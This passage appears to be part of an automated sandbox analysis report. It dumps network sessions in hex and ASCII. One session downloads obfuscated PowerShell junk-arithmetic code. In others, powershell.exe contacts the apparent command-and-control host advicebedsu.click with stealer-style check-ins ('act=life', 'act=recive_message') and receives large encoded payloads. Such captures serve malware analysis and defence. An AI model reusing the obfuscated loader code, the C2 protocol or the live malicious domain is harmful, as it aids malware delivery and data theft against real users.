                                                                                    Data Ascii: ryp + ((($MljwJryp - -12319) - $ydOtwkFh))) + $ydOtwkFh)$KvHojVRKo = (((($ydOtwkFh + 980) + $RrHVwNWFkpR) - -51531) * $RrHVwNWFkpR)$yQUIMHhW = ((((($MljwJryp + $ydOtwkFh) * -183) - 5425) + -780) * $yQUIMHhW)$lKvHsvSFKh = (($ydOtwkFh - (((((($lKvHsvS
                                                                                    2024-12-30 08:18:06 UTC1369INData Raw: 20 2d 39 36 38 29 20 2d 20 24 77 74 79 63 4a 42 51 4f 45 29 20 2d 20 24 66 6b 75 56 62 58 5a 6f 65 56 5a 29 20 2a 20 24 79 64 4f 74 77 6b 46 68 29 0d 0a 24 5a 6f 4d 77 7a 6f 20 3d 20 28 28 28 28 28 24 41 75 51 44 42 68 47 5a 4b 20 2a 20 28 28 28 36 37 35 31 36 38 20 2a 20 2d 39 32 29 20 2a 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 29 29 20 2a 20 28 28 28 28 2d 31 20 2b 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2a 20 2d 38 30 30 34 35 29 20 2b 20 24 79 51 55 49 4d 48 68 57 29 29 29 20 2a 20 35 32 36 34 34 34 29 20 2d 20 24 6a 5a 79 4a 78 78 41 6c 59 29 20 2d 20 35 38 32 37 32 29 0d 0a 24 7a 66 71 72 71 73 48 73 49 66 6d 20 3d 20 28 28 24 73 6f 65 4b 69 59 44 6b 71 65 59 20 2b 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2a 20 24 4b 76 48 6f 6a 56 52 4b 6f 29
                                                                                    Data Ascii: -968) - $wtycJBQOE) - $fkuVbXZoeVZ) * $ydOtwkFh)$ZoMwzo = ((((($AuQDBhGZK * (((675168 * -92) * $RrHVwNWFkpR))) * ((((-1 + $lKvHsvSFKh) * -80045) + $yQUIMHhW))) * 526444) - $jZyJxxAlY) - 58272)$zfqrqsHsIfm = (($soeKiYDkqeY + $lKvHsvSFKh) * $KvHojVRKo)
                                                                                    2024-12-30 08:18:06 UTC1369INData Raw: 76 48 6f 6a 56 52 4b 6f 20 2a 20 24 5a 63 69 55 6a 75 55 62 59 29 20 2b 20 24 67 67 4a 64 54 56 74 6e 70 43 29 29 29 20 2a 20 2d 37 39 34 30 37 29 20 2a 20 36 29 0d 0a 20 20 20 20 69 66 20 28 28 24 41 75 51 44 42 68 47 5a 4b 20 2d 6c 74 20 24 71 6f 46 70 4c 68 6e 66 29 20 2d 6f 72 20 28 24 52 72 48 56 77 4e 57 46 6b 70 52 20 2d 65 71 20 2d 33 32 35 32 29 20 2d 6f 72 20 28 38 20 2d 67 65 20 24 7a 66 71 72 71 73 48 73 49 66 6d 29 20 2d 6f 72 20 28 24 5a 63 69 55 6a 75 55 62 59 20 2d 67 74 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 6e 4e 73 4c 73 4c 62 53 47 20 3d 20 28 28 28 24 7a 66 71 72 71 73 48 73 49 66 6d 20 2b 20 2d 33 35 39 38 29 20 2b 20 28 28 28 24 6c 4b 76 48 73 76 53 46 4b 68 20 2d 20 24 73 6f 65 4b 69 59 44
                                                                                    Data Ascii: vHojVRKo * $ZciUjuUbY) + $ggJdTVtnpC))) * -79407) * 6) if (($AuQDBhGZK -lt $qoFpLhnf) -or ($RrHVwNWFkpR -eq -3252) -or (8 -ge $zfqrqsHsIfm) -or ($ZciUjuUbY -gt $lKvHsvSFKh)) { $nNsLsLbSG = ((($zfqrqsHsIfm + -3598) + ((($lKvHsvSFKh - $soeKiYD
                                                                                    2024-12-30 08:18:06 UTC1369INData Raw: 20 24 7a 66 71 72 71 73 48 73 49 66 6d 29 29 0d 0a 20 20 20 20 69 66 20 28 28 34 36 20 2d 6c 65 20 24 73 6f 65 4b 69 59 44 6b 71 65 59 29 20 2d 61 6e 64 20 28 32 20 2d 6e 65 20 2d 32 29 20 2d 61 6e 64 20 28 24 67 67 4a 64 54 56 74 6e 70 43 20 2d 6c 65 20 24 41 6e 50 74 6e 43 4a 56 41 50 4a 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 67 48 66 64 72 4f 46 20 3d 20 28 28 28 28 28 28 28 2d 31 36 35 33 33 30 20 2d 20 24 7a 64 74 6d 50 43 49 64 6a 65 29 20 2a 20 28 28 28 28 2d 39 38 35 39 37 20 2d 20 24 71 6f 46 70 4c 68 6e 66 29 20 2a 20 33 38 37 39 30 29 20 2a 20 37 32 33 35 38 37 29 29 29 20 2b 20 2d 38 35 36 35 29 20 2b 20 28 28 28 28 24 56 41 58 70 51 68 20 2d 20 2d 37 34 34 32 35 29 20 2b 20 24 73 6f 65 4b 69 59 44 6b 71 65 59 29 20 2a 20 24 41 75 51 44
                                                                                    Data Ascii: $zfqrqsHsIfm)) if ((46 -le $soeKiYDkqeY) -and (2 -ne -2) -and ($ggJdTVtnpC -le $AnPtnCJVAPJ)) { $gHfdrOF = (((((((-165330 - $zdtmPCIdje) * ((((-98597 - $qoFpLhnf) * 38790) * 723587))) + -8565) + (((($VAXpQh - -74425) + $soeKiYDkqeY) * $AuQD
                                                                                    2024-12-30 08:18:06 UTC1369INData Raw: 70 52 29 20 2b 20 24 5a 63 69 55 6a 75 55 62 59 29 20 2b 20 31 38 29 20 2a 20 28 28 28 28 28 24 66 6b 75 56 62 58 5a 6f 65 56 5a 20 2d 20 2d 35 35 31 32 37 29 20 2d 20 28 28 28 28 28 28 24 7a 64 74 6d 50 43 49 64 6a 65 20 2b 20 2d 32 29 20 2b 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2d 20 24 6c 4b 76 48 73 76 53 46 4b 68 29 20 2b 20 24 4a 4f 44 52 52 75 29 20 2d 20 24 67 67 4a 64 54 56 74 6e 70 43 29 29 29 29 20 2a 20 28 28 28 28 2d 38 32 30 20 2d 20 33 38 34 39 29 20 2d 20 36 37 30 29 20 2b 20 2d 33 32 33 34 30 34 29 20 2b 20 31 30 29 29 29 29 29 29 20 2a 20 2d 37 32 33 33 29 20 2a 20 35 37 33 37 34 29 29 20 2b 20 28 28 36 30 20 2a 20 28 28 28 28 24 58 72 76 4b 6c 6a 20 2d 20 24 4a 4f 44 52 52 75 29 20 2a 20 24 5a 6f 4d 77 7a 6f 29 20 2d 20 37 29 29 29
                                                                                    Data Ascii: pR) + $ZciUjuUbY) + 18) * ((((($fkuVbXZoeVZ - -55127) - (((((($zdtmPCIdje + -2) + $lKvHsvSFKh) - $lKvHsvSFKh) + $JODRRu) - $ggJdTVtnpC)))) * ((((-820 - 3849) - 670) + -323404) + 10)))))) * -7233) * 57374)) + ((60 * (((($XrvKlj - $JODRRu) * $ZoMwzo) - 7)))
                                                                                    2024-12-30 08:18:06 UTC1369INData Raw: 20 2d 34 39 29 20 2a 20 24 5a 6f 4d 77 7a 6f 29 20 2b 20 24 67 67 4a 64 54 56 74 6e 70 43 29 20 2d 20 24 67 67 4a 64 54 56 74 6e 70 43 29 20 2b 20 2d 35 35 33 31 34 29 29 29 20 2a 20 32 37 30 29 0d 0a 20 20 20 20 24 67 59 65 52 44 68 62 52 4f 2d 2d 0d 0a 7d 0d 0a 69 66 20 28 28 36 34 36 39 20 2d 6c 74 20 24 7a 64 74 6d 50 43 49 64 6a 65 29 20 2d 6f 72 20 28 24 56 41 58 70 51 68 20 2d 6c 74 20 2d 31 32 39 29 29 20 7b 0d 0a 20 20 20 20 24 79 51 55 49 4d 48 68 57 20 3d 20 28 28 28 28 28 28 28 24 71 6f 46 70 4c 68 6e 66 20 2a 20 28 28 28 28 28 24 71 6f 46 70 4c 68 6e 66 20 2b 20 28 28 28 2d 31 32 36 34 33 32 20 2b 20 24 52 72 48 56 77 4e 57 46 6b 70 52 29 20 2a 20 2d 35 31 35 39 30 33 29 29 29 20 2b 20 24 67 67 4a 64 54 56 74 6e 70 43 29 20 2d 20 24 6c 4b 76
                                                                                    Data Ascii: -49) * $ZoMwzo) + $ggJdTVtnpC) - $ggJdTVtnpC) + -55314))) * 270) $gYeRDhbRO--}if ((6469 -lt $zdtmPCIdje) -or ($VAXpQh -lt -129)) { $yQUIMHhW = ((((((($qoFpLhnf * ((((($qoFpLhnf + (((-126432 + $RrHVwNWFkpR) * -515903))) + $ggJdTVtnpC) - $lKv
                                                                                    2024-12-30 08:18:06 UTC1369INData Raw: 2a 20 24 73 6f 65 4b 69 59 44 6b 71 65 59 29 20 2b 20 24 76 76 6b 45 44 50 61 62 29 20 2d 20 24 56 41 58 70 51 68 29 20 2b 20 28 28 28 28 28 28 35 37 34 20 2b 20 24 67 67 4a 64 54 56 74 6e 70 43 29 20 2a 20 24 4c 46 7a 68 4e 6f 62 6a 5a 29 20 2d 20 33 38 31 29 20 2d 20 24 79 64 4f 74 77 6b 46 68 29 20 2a 20 2d 32 34 39 36 37 38 29 29 29 20 2d 20 2d 36 29 29 0d 0a 7d 0d 0a 24 51 4e 54 5a 43 42 20 3d 20 36 0d 0a 77 68 69 6c 65 20 28 24 51 4e 54 5a 43 42 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 69 66 20 28 28 24 52 72 48 56 77 4e 57 46 6b 70 52 20 2d 6c 74 20 31 30 33 29 20 2d 61 6e 64 20 28 24 77 74 79 63 4a 42 51 4f 45 20 2d 6c 65 20 2d 35 31 37 35 37 38 29 20 2d 61 6e 64 20 28 24 62 48 43 78 7a 43 5a 20 2d 6c 74 20 30 29 29 20 7b 0d 0a 20 20 20 20 20
                                                                                    Data Ascii: * $soeKiYDkqeY) + $vvkEDPab) - $VAXpQh) + ((((((574 + $ggJdTVtnpC) * $LFzhNobjZ) - 381) - $ydOtwkFh) * -249678))) - -6))}$QNTZCB = 6while ($QNTZCB -gt 0) { if (($RrHVwNWFkpR -lt 103) -and ($wtycJBQOE -le -517578) -and ($bHCxzCZ -lt 0)) {
                                                                                    2024-12-30 08:18:06 UTC1369INData Raw: 24 66 6b 75 56 62 58 5a 6f 65 56 5a 20 3d 20 28 28 28 2d 35 37 39 20 2a 20 31 34 39 30 29 20 2b 20 2d 39 39 38 32 29 20 2b 20 2d 39 39 29 0d 0a 69 66 20 28 28 2d 37 39 30 20 2d 6c 74 20 24 77 74 79 63 4a 42 51 4f 45 29 20 2d 61 6e 64 20 28 24 56 41 58 70 51 68 20 2d 6e 65 20 24 4a 4f 44 52 52 75 29 20 2d 61 6e 64 20 28 24 5a 6f 4d 77 7a 6f 20 2d 65 71 20 24 7a 66 71 72 71 73 48 73 49 66 6d 29 29 20 7b 0d 0a 20 20 20 20 24 4a 4f 44 52 52 75 20 3d 20 28 28 28 28 28 24 58 72 76 4b 6c 6a 20 2d 20 28 28 28 28 28 28 24 5a 63 69 55 6a 75 55 62 59 20 2d 20 2d 36 39 34 36 29 20 2b 20 24 58 72 76 4b 6c 6a 29 20 2a 20 28 28 28 28 28 28 2d 33 38 32 20 2b 20 36 30 31 30 29 20 2a 20 2d 34 29 20 2d 20 33 37 29 20 2a 20 39 39 37 31 29 20 2d 20 24 56 41 58 70 51 68 29 29
                                                                                    Data Ascii: $fkuVbXZoeVZ = (((-579 * 1490) + -9982) + -99)if ((-790 -lt $wtycJBQOE) -and ($VAXpQh -ne $JODRRu) -and ($ZoMwzo -eq $zfqrqsHsIfm)) { $JODRRu = ((((($XrvKlj - (((((($ZciUjuUbY - -6946) + $XrvKlj) * ((((((-382 + 6010) * -4) - 37) * 9971) - $VAXpQh))
                                                                                    2024-12-30 08:18:06 UTC1191INData Raw: 6c 65 20 28 24 53 63 6a 77 5a 57 47 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 24 79 51 55 49 4d 48 68 57 20 3d 20 28 28 28 28 28 24 7a 64 74 6d 50 43 49 64 6a 65 20 2d 20 24 66 6b 75 56 62 58 5a 6f 65 56 5a 29 20 2a 20 28 28 28 28 28 24 52 72 48 56 77 4e 57 46 6b 70 52 20 2a 20 2d 38 29 20 2d 20 38 31 35 33 29 20 2a 20 24 4d 6c 6a 77 4a 72 79 70 29 20 2a 20 24 79 49 70 65 6d 75 4f 63 66 29 29 29 20 2a 20 28 28 28 28 24 6c 4b 76 48 73 76 53 46 4b 68 20 2a 20 2d 38 35 38 29 20 2a 20 2d 34 35 29 20 2a 20 24 76 76 6b 45 44 50 61 62 29 29 29 29 20 2b 20 28 28 28 24 76 76 6b 45 44 50 61 62 20 2d 20 24 79 51 55 49 4d 48 68 57 29 20 2b 20 24 5a 6f 4d 77 7a 6f 29 20 2a 20 2d 34 38 32 39 34 39 29 29 0d 0a 20 20 20 20 24 79 51 55 49 4d 48 68 57 20 3d 20 28 28 28
                                                                                    Data Ascii: le ($ScjwZWG -gt 0) { $yQUIMHhW = ((((($zdtmPCIdje - $fkuVbXZoeVZ) * ((((($RrHVwNWFkpR * -8) - 8153) * $MljwJryp) * $yIpemuOcf))) * (((($lKvHsvSFKh * -858) * -45) * $vvkEDPab)))) + ((($vvkEDPab - $yQUIMHhW) + $ZoMwzo) * -482949)) $yQUIMHhW = (((


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.449916104.21.84.2414437652C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-30 08:19:23 UTC264OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: advicebedsu.click
                                                                                    2024-12-30 08:19:23 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-12-30 08:19:24 UTC1129INHTTP/1.1 200 OK
                                                                                    Date: Mon, 30 Dec 2024 08:19:24 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=jl2cboucta7esi49l680athj7a; expires=Fri, 25 Apr 2025 02:06:03 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rdq0ZQdUuXgx8aMl8D89vOPwawoe7kzORpYYaJ1Yp%2BX6YszLQFlTq0voNU8CYgGHCS6IJxxTd%2F9%2FPcOvcjcnlrBvr7BRHR2t8qlFp3YmzRBdKvEHBN7RLuUBUiRXhyTaIGKhdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8fa09aca7a04434b-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1581&rtt_var=604&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1796923&cwnd=243&unsent_bytes=0&cid=87618416b26ce696&ts=468&x=0"
                                                                                    2024-12-30 08:19:24 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                    Data Ascii: 2ok
                                                                                    2024-12-30 08:19:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.449922104.21.84.2414437652C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-30 08:19:24 UTC265OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 48
                                                                                    Host: advicebedsu.click
                                                                                    2024-12-30 08:19:24 UTC48OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 35 26 6a 3d
                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=yJEcaG--singl5&j=
                                                                                    2024-12-30 08:19:25 UTC1127INHTTP/1.1 200 OK
                                                                                    Date: Mon, 30 Dec 2024 08:19:25 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=2dnr026r6q5i409f1b7imsrru3; expires=Fri, 25 Apr 2025 02:06:04 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EKZe9J3e33Tcugs0270SMGcW%2BZ6DOj7owqg%2F3JXpz6QTjiaS7iHa0ORG2P9UFAYsBPEfYfEgZJFf8bJolzByFqWY6sPVbgq96bxNSpSkQUkvYCekezjGLhDeiB1fMH0i0TnQmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8fa09ad0f82e424d-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1595&rtt_var=624&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=949&delivery_rate=1830721&cwnd=208&unsent_bytes=0&cid=fc6c8f569b1e3443&ts=603&x=0"
                                                                                    2024-12-30 08:19:25 UTC242INData Raw: 34 36 35 0d 0a 74 4a 78 72 6b 2f 46 4e 53 68 64 42 49 6b 54 73 54 73 42 2f 76 42 41 79 63 41 33 57 62 54 36 53 50 35 44 65 30 34 70 65 57 61 76 50 76 68 32 78 79 33 6c 6d 4e 54 4a 48 5a 74 59 36 73 67 72 5a 50 42 41 52 61 66 52 58 57 50 4e 54 34 37 76 2f 71 43 67 30 69 59 37 36 43 76 2b 43 4b 47 59 31 4a 46 70 6d 31 68 57 37 58 64 6c 2b 45 45 6f 76 73 77 64 63 38 31 50 79 76 37 6a 6c 4c 6a 58 49 33 50 41 4d 2b 35 51 75 4c 6e 59 74 54 79 47 4a 4b 36 45 56 30 6e 6c 66 47 47 44 30 51 52 7a 33 52 62 4c 6b 38 63 63 37 4c 63 72 35 2f 52 6a 34 30 7a 42 6d 62 47 4e 48 4b 73 35 30 34 68 37 5a 63 6c 34 57 61 62 30 46 56 76 70 62 38 37 71 35 2b 6a 63 2f 77 39 7a 2b 44 2f 71 65 4a 7a 70 37 4a 30 67 71 6a 79 47 68 58 5a 41 79 56
                                                                                    Data Ascii: 465tJxrk/FNShdBIkTsTsB/vBAycA3WbT6SP5De04peWavPvh2xy3lmNTJHZtY6sgrZPBARafRXWPNT47v/qCg0iY76Cv+CKGY1JFpm1hW7Xdl+EEovswdc81Pyv7jlLjXI3PAM+5QuLnYtTyGJK6EV0nlfGGD0QRz3RbLk8cc7Lcr5/Rj40zBmbGNHKs504h7Zcl4Wab0FVvpb87q5+jc/w9z+D/qeJzp7J0gqjyGhXZAyV
                                                                                    2024-12-30 08:19:25 UTC890INData Raw: 77 6f 76 37 45 38 50 77 6c 37 6a 72 61 54 6c 4c 44 32 4a 79 62 41 51 73 5a 51 6a 61 43 31 6a 53 43 71 41 4b 61 45 53 32 58 4e 51 41 47 43 30 44 46 54 34 57 66 69 7a 76 75 63 79 4d 63 37 65 39 77 37 2b 6c 43 63 75 65 69 41 41 61 4d 34 72 75 6c 32 47 4d 6e 41 43 62 4c 63 62 55 65 45 64 37 66 4b 6f 71 44 73 33 69 59 36 2b 44 2f 2b 53 49 69 68 6e 4b 30 73 74 69 7a 36 70 46 4e 4e 2f 55 42 39 6c 75 77 78 63 39 31 66 34 73 37 76 73 4d 54 62 50 31 76 35 4a 76 39 4d 6f 4d 44 56 37 41 41 57 4c 50 4b 55 52 79 44 42 71 55 6e 44 36 46 68 7a 33 55 62 4c 6b 38 65 41 35 4f 4d 72 64 38 51 72 35 6d 44 30 6f 5a 79 56 4e 49 35 77 71 70 78 50 55 63 55 49 59 59 62 49 4d 56 66 74 55 39 37 75 31 71 48 4a 37 7a 73 36 2b 55 62 47 79 49 69 4e 35 4b 56 63 6d 7a 6a 50 73 42 4a 35 31
                                                                                    Data Ascii: wov7E8Pwl7jraTlLD2JybAQsZQjaC1jSCqAKaES2XNQAGC0DFT4WfizvucyMc7e9w7+lCcueiAAaM4rul2GMnACbLcbUeEd7fKoqDs3iY6+D/+SIihnK0stiz6pFNN/UB9luwxc91f4s7vsMTbP1v5Jv9MoMDV7AAWLPKURyDBqUnD6Fhz3UbLk8eA5OMrd8Qr5mD0oZyVNI5wqpxPUcUIYYbIMVftU97u1qHJ7zs6+UbGyIiN5KVcmzjPsBJ51
                                                                                    2024-12-30 08:19:25 UTC1369INData Raw: 34 35 32 66 0d 0a 43 75 79 4b 4e 31 38 58 68 56 35 39 42 41 53 36 52 33 31 73 50 47 77 66 44 54 47 32 66 59 4a 38 4a 63 69 4c 48 51 75 54 43 2b 4e 49 4b 34 56 30 33 35 55 48 57 65 38 44 46 54 69 55 2f 79 36 74 2b 67 35 65 34 65 57 2b 52 47 78 79 32 38 4d 65 7a 52 55 4c 63 77 5a 6f 52 50 51 64 55 5a 53 63 50 6f 57 48 50 64 52 73 75 54 78 35 6a 45 77 78 64 48 33 43 50 4b 54 4a 53 5a 36 4b 55 67 75 6a 69 47 6a 46 74 5a 30 58 52 6c 67 75 77 68 55 38 31 48 33 73 62 4b 6f 63 6e 76 4f 7a 72 35 52 73 62 59 68 4b 32 51 79 41 68 4f 4e 49 71 77 61 79 44 4a 50 58 48 62 30 43 46 43 77 42 62 4b 32 74 75 38 34 4e 73 50 56 2b 67 33 38 6e 43 59 68 66 44 46 4b 4b 6f 41 2b 72 78 66 62 66 46 77 58 59 4c 51 4f 58 66 35 58 2b 66 7a 2f 71 44 73 6a 69 59 36 2b 4a 76 79 44 50 53
                                                                                    Data Ascii: 452fCuyKN18XhV59BAS6R31sPGwfDTG2fYJ8JciLHQuTC+NIK4V035UHWe8DFTiU/y6t+g5e4eW+RGxy28MezRULcwZoRPQdUZScPoWHPdRsuTx5jEwxdH3CPKTJSZ6KUgujiGjFtZ0XRlguwhU81H3sbKocnvOzr5RsbYhK2QyAhONIqwayDJPXHb0CFCwBbK2tu84NsPV+g38nCYhfDFKKoA+rxfbfFwXYLQOXf5X+fz/qDsjiY6+JvyDPS
                                                                                    2024-12-30 08:19:25 UTC1369INData Raw: 61 4d 34 72 75 6c 32 47 4d 6e 38 52 65 62 35 50 51 37 35 45 73 72 75 39 71 47 52 37 77 39 72 36 43 76 32 61 49 79 56 30 4a 30 63 72 69 69 79 6b 47 39 74 7a 57 78 70 6a 75 77 56 51 39 46 48 37 75 72 33 72 50 7a 32 4a 6d 4c 34 4f 36 64 4e 33 61 46 51 75 53 79 71 4f 4c 37 4d 61 6e 6a 77 51 48 47 6d 30 54 77 54 6d 54 65 57 37 72 71 59 6c 65 38 37 61 76 6c 47 78 6d 54 30 74 65 79 64 4b 49 34 6f 67 71 42 33 62 59 46 67 55 61 4c 67 48 57 66 39 62 39 37 47 32 34 7a 38 70 32 39 58 36 42 2f 33 54 59 57 68 79 4f 77 42 2b 7a 67 6d 31 48 73 35 30 55 31 4a 77 2b 68 59 63 39 31 47 79 35 50 48 6f 4d 6a 66 43 30 66 55 43 39 5a 63 76 4a 58 34 74 54 69 2b 43 4a 4b 34 61 7a 48 39 56 47 6d 57 39 43 6c 44 39 58 75 43 2f 73 4b 68 79 65 38 37 4f 76 6c 47 78 74 42 77 66 56 6d 4e
                                                                                    Data Ascii: aM4rul2GMn8Reb5PQ75Esru9qGR7w9r6Cv2aIyV0J0criiykG9tzWxpjuwVQ9FH7ur3rPz2JmL4O6dN3aFQuSyqOL7ManjwQHGm0TwTmTeW7rqYle87avlGxmT0teydKI4ogqB3bYFgUaLgHWf9b97G24z8p29X6B/3TYWhyOwB+zgm1Hs50U1Jw+hYc91Gy5PHoMjfC0fUC9ZcvJX4tTi+CJK4azH9VGmW9ClD9XuC/sKhye87OvlGxtBwfVmN
                                                                                    2024-12-30 08:19:25 UTC1369INData Raw: 4b 55 46 6e 69 6f 51 50 6d 79 37 42 42 7a 76 45 2b 76 38 74 75 52 38 59 34 6e 52 39 67 48 2f 6b 43 6b 6a 65 53 39 42 4c 34 67 70 71 68 72 52 64 56 6b 56 62 37 49 64 57 2f 31 55 38 72 65 34 34 6a 67 36 77 70 61 77 53 66 61 4c 62 33 41 31 45 55 63 77 6e 69 2f 69 41 70 42 72 45 42 56 6a 39 46 63 63 2f 55 2f 7a 75 61 50 73 4d 7a 44 62 33 66 67 4a 39 49 45 6f 4a 48 38 73 51 79 36 44 4c 36 6f 50 33 6e 39 51 41 48 32 79 42 46 4b 77 45 37 4b 37 71 61 68 6b 65 2f 6a 42 39 55 6e 75 33 54 5a 6f 63 69 38 41 66 73 34 76 71 42 44 51 59 46 51 55 5a 4c 63 42 56 50 56 56 39 72 61 38 35 7a 63 78 77 4e 37 2b 42 76 53 62 4a 43 35 37 49 6b 59 71 67 32 7a 73 58 64 6c 71 45 45 6f 76 6b 78 56 52 39 6b 72 6a 69 62 62 6f 62 58 76 57 6d 4f 64 4a 39 70 39 76 63 44 55 75 54 43 79 44
                                                                                    Data Ascii: KUFnioQPmy7BBzvE+v8tuR8Y4nR9gH/kCkjeS9BL4gpqhrRdVkVb7IdW/1U8re44jg6wpawSfaLb3A1EUcwni/iApBrEBVj9Fcc/U/zuaPsMzDb3fgJ9IEoJH8sQy6DL6oP3n9QAH2yBFKwE7K7qahke/jB9Unu3TZoci8Afs4vqBDQYFQUZLcBVPVV9ra85zcxwN7+BvSbJC57IkYqg2zsXdlqEEovkxVR9krjibbobXvWmOdJ9p9vcDUuTCyD
                                                                                    2024-12-30 08:19:25 UTC1369INData Raw: 51 79 54 31 78 32 39 41 68 51 73 41 57 79 73 72 7a 75 50 54 72 42 33 76 34 50 2b 35 63 73 49 58 59 6b 53 53 43 46 4c 36 67 53 32 58 52 55 45 6d 53 7a 41 56 72 31 56 76 76 38 2f 36 67 37 49 34 6d 4f 76 69 2f 53 67 54 30 61 65 79 42 62 5a 70 46 69 75 31 33 5a 66 68 42 4b 4c 37 38 48 55 2b 4a 59 2b 37 53 31 34 54 77 2f 77 39 76 35 43 66 53 65 4b 69 78 37 4a 30 63 6d 67 69 4f 6c 46 64 46 32 55 42 30 76 2b 6b 39 62 36 42 32 71 2f 4a 48 6a 4b 68 72 48 33 65 78 4a 37 74 30 32 61 48 49 76 41 48 37 4f 49 71 73 63 31 6e 78 63 47 6d 75 6d 44 31 66 35 55 76 4f 7a 73 65 73 39 4d 63 48 45 2b 41 6e 36 6d 79 67 67 63 53 31 53 4a 34 46 73 37 46 33 5a 61 68 42 4b 4c 34 55 5a 57 2f 64 53 73 4a 57 32 38 7a 30 78 79 74 33 79 53 65 37 64 4e 6d 68 79 4c 77 42 2b 7a 69 47 75 45
                                                                                    Data Ascii: QyT1x29AhQsAWysrzuPTrB3v4P+5csIXYkSSCFL6gS2XRUEmSzAVr1Vvv8/6g7I4mOvi/SgT0aeyBbZpFiu13ZfhBKL78HU+JY+7S14Tw/w9v5CfSeKix7J0cmgiOlFdF2UB0v+k9b6B2q/JHjKhrH3exJ7t02aHIvAH7OIqsc1nxcGmumD1f5UvOzses9McHE+An6myggcS1SJ4Fs7F3ZahBKL4UZW/dSsJW28z0xyt3ySe7dNmhyLwB+ziGuE
                                                                                    2024-12-30 08:19:25 UTC1369INData Raw: 53 61 4c 68 50 42 4c 42 57 2f 4c 6d 77 35 44 59 38 78 38 54 2f 41 2f 32 53 4b 43 39 2b 4d 55 73 30 68 53 53 68 45 39 5a 37 55 42 78 76 74 51 4a 63 73 42 4f 79 75 36 6d 6f 5a 48 76 73 39 65 6b 66 2b 39 45 4d 50 32 4d 70 52 79 71 59 4a 36 4d 65 79 48 39 41 55 69 48 30 48 6c 76 68 48 61 71 71 6f 66 38 37 4a 49 66 50 76 67 37 39 30 33 64 6f 66 69 78 4f 4b 34 55 6f 71 78 6a 57 63 56 55 58 5a 62 67 44 58 66 68 55 2b 4c 6d 30 37 6a 59 34 78 39 6e 2f 42 66 57 61 49 53 45 31 62 51 41 68 6c 6d 7a 36 58 65 68 69 56 77 70 69 70 45 31 75 38 30 7a 6a 71 62 7a 34 4f 6e 6e 6d 31 66 49 4b 39 4a 51 2f 61 47 70 74 57 57 61 4a 49 4f 4a 46 6e 6e 4a 55 48 6d 79 7a 41 56 50 39 55 76 57 33 76 75 49 79 4b 63 62 54 39 67 58 35 6e 6a 30 69 66 7a 46 4a 4c 34 4d 69 71 67 2f 64 